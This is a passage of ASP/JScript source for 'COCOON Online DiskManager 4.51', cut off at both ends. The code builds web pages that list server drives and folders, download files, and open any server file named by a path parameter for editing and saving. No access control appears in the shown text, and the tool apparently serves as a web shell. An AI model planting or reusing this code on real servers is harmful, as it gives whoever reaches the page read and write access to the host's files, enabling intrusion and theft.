t;aItemList[i].length;++j){Response.Write("
" + aItemList[i][j]);};Response.Write("''>" + "<span class=''detail0'' id=''icon_item''>"+ "" + aItemList[i]+ " " + aItemList[i] + "</span>"+ "<span class=''detail1''>" + aItemList[i] + "</span>"+ "<span class=''detail2''>" + aItemList[i] + "</span>"+ "<span class=''detail3''>" + aItemList[i] + "</span>"+ "<span class=''detail4''>" + aItemList[i] + "</span>"+ "</span>");};};Cc_Dm4.ShowCurrentFolder = function(sTarget){if(sAction!="f") return;var oDm = new Cc_DiskManager;var aItemList = oDm.GetFolderInfo(sTarget);var i = 0;Response.write("" + aItemList[i] + "<b>" + aItemList[i] + "</b>");Response.Write("<pre>");for(var j=6;j<aItemList[i].length;++j){Response.Write("\r\n" + aItemList[i][j]);};Response.Write("</pre>" + "\r\n\r\n");};Cc_Dm4.ShowDriverList = function(){var oDm = new Cc_DiskManager;var aDriverList = oDm.GetDriverList();this.ShowItem(aDriverList);};Cc_Dm4.ShowFolderList = function(sTarget){var oDm = new Cc_DiskManager;var aFolderList = oDm.GetFolderList(sTarget);this.ShowItem(aFolderList);};Cc_Dm4.DownloadFile = function(sTarget){var oDm = new Cc_DiskManager;oDm.DownloadFile(sTarget);};Cc_Dm4.HtmlHead = ""+ "<html><head><title>COCOON Online DiskManager 4.51 - Cocoon Studio (www.ccopus.com)</title>"+ "<meta http-equiv=''Content-Type'' content=''text/html; charset=gb2312''>" + "<style>" + "form{margin:0;font-size:9pt;}; "+ "textarea{font-family:Tahoma;font-size:9pt; padding:5px;};"+ "body{margin:2;border:none;overflow:hidden;background-color:buttonface}; "+ "fieldset{margin:2px;font-size:9pt;height:76px;overflow:auto;}; "+ "input{font-family:Tahoma;font-size:9pt;};"+ "pre{margin:0};"+ ".banner{margin-top:8px;margin-right:10px;text-align:right;font-family:Tahoma;font-weight:bold};"+ "</style>"+ "</head>"+ "<body>";Cc_Dm4.HtmlFoot = "</body></html>";Cc_Dm4.EditFile = function(sTarget){var oDm = new Cc_DiskManager;var sBody = oDm.ReadFile(sTarget);Response.write( this.HtmlHead+ "<form style=''width:100%;height:100%;'' method=''post'' action=''" + sUrl + "''>"+ "<textarea name=fileContent style=''width:100%;height:90%;''>" + Server.HTMLEncode(sBody) + "</textarea><br>"+ "<div style=''padding-top:5px''> 文件路径:<input type=''text'' name=t value=''" + sTarget + "'' readonly style=''overflow:visible;''>"+ "<input type=''hidden'' name=a value=s> "+ "<input type=checkbox name=ColseWindow id=chk_closewindow value=close><label for=chk_closewindow checked>保存完毕关闭窗口</label> "+ "<input type=''submit'' name=btnSubmit value=''保存'' style=''width:75px;'' onclick=\"form.a.value=''s''\">"+ "<input type=''reset'' name=btnReset value=''恢复'' style=''width:75px;''>"+ "<input type=''button'' name=btnReset value=''清空'' style=''width:75px;'' onclick=\"form.fileContent.v